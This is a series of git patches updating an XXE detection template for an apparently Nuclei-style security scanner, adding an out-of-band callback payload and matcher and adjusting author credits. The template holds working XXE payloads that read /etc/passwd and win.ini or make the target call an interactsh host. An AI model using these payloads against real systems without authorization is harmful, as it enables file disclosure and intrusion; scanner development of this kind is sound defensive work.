From dd91ad9765118b7407e63af07931faa4b22c650a Mon Sep 17 00:00:00 2001
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
Date: Tue, 23 Jul 2024 11:21:35 +0330
Subject: [PATCH 1/3] Improve generic-xxe.yaml

---
 dast/vulnerabilities/xxe/generic-xxe.yaml | 11 ++++++++---
 1 file changed, 8 insertions(+), 3 deletions(-)

diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml
index ff5cbd8d9d..54b53b1ee4 100644
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@@ -2,7 +2,7 @@ id: generic-xxe
 
 info:
   name: Generic XML external entity (XXE)
-  author: pwnhxl
+  author: pwnhxl, AmirHossein Raeisi
   severity: medium
   reference:
     - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
@@ -23,6 +23,7 @@ http:
       xxe:
         - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
         - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
+        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "http://{{interactsh-url}}"> ]><x>&{{rletter}};</x>'
 
     fuzzing:
       - part: query
@@ -38,7 +39,6 @@ http:
           - "{{xxe}}"
 
     stop-at-first-match: true
-    matchers-condition: or
     matchers:
       - type: regex
         name: linux
@@ -51,4 +51,9 @@ http:
         part: body
         words:
           - 'for 16-bit app support'
-# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950

From 3934b2b1bc98e475a15c4624383ab39b3bd22ba9 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 24 Jul 2024 14:08:52 +0530
Subject: [PATCH 2/3] Update generic-xxe.yaml

---
 dast/vulnerabilities/xxe/generic-xxe.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml
index 54b53b1ee4..5992137d30 100644
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@@ -1,8 +1,8 @@
 id: generic-xxe
 
 info:
-  name: Generic XML external entity (XXE)
-  author: pwnhxl, AmirHossein Raeisi
+  name: Generic XML External Entity - (XXE)
+  author: pwnhxl,Ahsraeisi
   severity: medium
   reference:
     - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py

From 8c57d4b85feefa50629428b6abecf8ef6aa0f53d Mon Sep 17 00:00:00 2001
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
Date: Wed, 24 Jul 2024 12:12:53 +0330
Subject: [PATCH 3/3] Update generic-xxe.yaml

---
 dast/vulnerabilities/xxe/generic-xxe.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml
index 5992137d30..ecd44c93e3 100644
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@@ -2,7 +2,7 @@ id: generic-xxe
 
 info:
   name: Generic XML External Entity - (XXE)
-  author: pwnhxl,Ahsraeisi
+  author: pwnhxl,AmirHossein Raeisi
   severity: medium
   reference:
     - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py